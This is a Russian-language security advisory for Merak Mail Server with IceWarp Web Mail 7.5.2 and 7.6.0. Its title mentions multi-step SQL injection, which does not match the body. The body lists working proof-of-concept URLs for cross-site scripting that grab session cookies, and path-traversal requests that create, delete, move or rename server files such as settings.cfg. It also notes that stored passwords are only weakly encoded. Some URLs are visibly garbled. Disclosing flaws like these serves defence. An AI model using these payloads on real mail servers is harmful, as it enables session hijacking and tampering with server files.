Xakep #305. Многошаговые SQL-инъекции
Программа: Merak Mail Server with IceWarp Web Mail 7.5.2, 7.6.0
Обнаружено несколько уязвимостей в Merak Mail Server. Удаленный атакующий может выполнить межсайтовый скриптинг; удаленный авторизованный пользователь может обойти ограничения безопасности.
Некоторые сценарии некорректно обрабатывают входные данные пользователей. Удаленный атакующий может создать специально сформированный URL и получить доступ к важным данным пользователей. Примеры:
http://[target]:32000/mail/send.html?id=[sessionid]&redirectfile="> <script>alert(document.cookie)</script>
http://[target]:320 00/mail/send.html?id=[sessionid]&Old_Folder="> <script>alert(document.cookie)</script>
http://[target]:32000/mail/send.html?id=[sessionid]&Old_Message=" ><s cript>alert(document.cookie)</script>
http://[target]:32000/mail/send.html?id=[sessionid]&xwritesentcopy=
"><script>alert(document.cookie)</script>
http://[target]:32000/mail/send.html?id=[sessionid]&returnreceipt="> <script>alert(document.cookie)</script>
http://[target]:32000/mail/send.html?id=[sessioni d]&forwardfile="> <script>alert(document.cookie)</script>
http://[target]:32000/mail/send.html?id=[sessionid]&writepriority="
><script>alert(document.coo kie)</script>
http://[target]:32000/mail/send.html?id=[sessionid]©folder="> <script>alert(document.cookie)</script>
http://[target]:32000/mail/send .html?id=[sessionid]&messageid="> <script>alert(document.cookie)</script>
http://[target]:32000/mail/attachment.html?id=[sessionid]&attachmentpage
_text_error=<script>alert(document.cookie)</script>
http://[target]:32000/mail/attachment.html?id=[session id]&attachmentpage_text_title=</title><script>alert(
document.cookie)</
http://[target]:32000/mail/folderitem.html?id=[session id]&folderold=
"><script>alert(document.cookie)</script>
Также сообщается, что удаленный авторизованный пользователь может из-за уязвимости в сценарии 'viewaction.html' создать и удалить произвольные директории на сервере. Пример:
http://[target]:32000/mail/viewaction.html?id=[sessionid]&folder=
../../../../../../../[arbitarydirectory]&Move_x=1&originalfolder=blabla
http://[target]:32000/mail/viewaction.html?id=[sessionid]&messageid=
...//...//...//...//…//&# 8230;//…//winnt/system32/cmd.exe&
Удаленный авторизованный атакующий может перемесить произвольные файлы на системе:
http://[target]:32000/mail/viewaction.html?id=[session id]&messageid=...//...//...//...//config/settings.cfg&Move_x
=1&originalfolder=blabla&m
Удаленный авторизованный пользователь может переименовать произвольный файл на системе:
http://[target]:32000/mail/folders.html?id=[session id]&folderold=blabla/...//...//...//...//config/
settings.cfg&folder=blabla/...//...//...//...//cm
Локальный пользователь может расшифровать пароли пользователей, которые хранятся в файлах users.cfg, settings.cfg (XOR), users.dat, and user.dat (Base64)
Удаленный авторизованный пользователь может создать файл 'accounts.dat' с произвольным содержимым.
